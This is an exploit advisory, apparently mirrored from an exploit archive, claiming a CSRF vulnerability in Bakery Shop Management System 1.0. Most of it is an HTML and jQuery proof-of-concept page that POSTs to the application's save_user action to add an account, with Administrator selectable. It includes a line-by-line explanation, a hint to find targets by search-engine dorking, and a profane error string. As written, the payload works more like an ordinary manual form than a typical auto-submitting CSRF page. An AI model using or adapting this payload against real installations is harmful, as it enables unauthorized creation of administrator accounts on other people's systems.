## https://sploitus.com/exploit?id=PACKETSTORM:180072
=============================================================================================================================================
| # Title : Bakery Shop Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML code :
represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX.
Let me break down the key components of this code:
[+] HTML Structure
Container & Form:
<div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.
<form action="" id="user-form">: This form collects user data. The action attribute is empty,
meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).
Hidden Input:
<input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID
is sent back to the server but isn't visible to the user.
[+] Form Fields:
Full Name:
<label for="fullname" class="control-label">Username</label>
<input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">
This field is actually mislabeled—the label says "Username," but the input is for the user's full name.
The input field is styled using Bootstrap classes.
Username:
<label for="username" class="control-label">Password</label>
<input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">
[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.
[+] User Type:
<label for="type" class="control-label">Type</label>
<select name="type" id="type" class="form-select form-select-sm rounded-0" required>
<option value="1">Administrator</option>
<option value="0">Cashier</option>
</select>
This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.
[+] Submit Button:
<button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.
[+] JavaScript (jQuery)
Form Submission Handling:
$(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.
$('#user-form').submit(function(e){ ... }): This function handles the form submission.
The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.
Message Handling:
$('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.
_el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).
AJAX Request:
$.ajax({ ... }): Sends the form data to the server without reloading the page.
URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.
Method: The data is sent using the POST method.
Data: The form data is serialized (_this.serialize()) and sent as JSON.
Error Handling:
If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"
—this is an inappropriate message and should be corrected to something like "An error occurred.").
Success Handling:
If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.
If the submission fails, the error message from the server response is displayed.
[+] Line 36 : Set your target url
[+] save payload as poc.html
[+] payload :
<div class="container-fluid">
<form action="" id="user-form">
<input type="hidden" name="id" value="">
<div class="form-group">
<label for="fullname" class="control-label">Username</label>
<input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">
</div>
<div class="form-group">
<label for="username" class="control-label">Password</label>
<input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">
</div>
<div class="form-group">
<label for="type" class="control-label">Type</label>
<select name="type" id="type" class="form-select form-select-sm rounded-0" required>
<option value="1">Administrator</option>
<option value="0">Cashier</option>
</select>
</div>
<button type="submit" class="btn btn-primary">Save</button>
</form>
</div>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
$(function(){
$('#user-form').submit(function(e){
e.preventDefault();
$('.pop_msg').remove(); // Remove any previous pop-up messages
var _this = $(this);
var _el = $('<div>').addClass('pop_msg');
$('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');
$.ajax({
url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',
method: 'POST',
data: _this.serialize(),
dataType: 'JSON',
error: function(err) {
console.log(err);
_el.addClass('alert alert-danger').text("Yes Mother fucker !");
_this.prepend(_el);
_el.show('slow');
$('#user-form button[type="submit"]').attr('disabled', false).text('Save');
},
success: function(resp) {
if (resp.status == 'success') {
_el.addClass('alert alert-success').text(resp.msg);
_this.prepend(_el);
_el.show('slow');
$('#user-form').get(0).reset(); // Reset form after successful submission
// Optional: reload page after a short delay
setTimeout(function() {
location.reload();
}, 2000);
} else {
_el.addClass('alert alert-danger').text(resp.msg);
_this.prepend(_el);
_el.show('slow');
}
$('#user-form button[type="submit"]').attr('disabled', false).text('Save');
}
});
});
});
</script>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================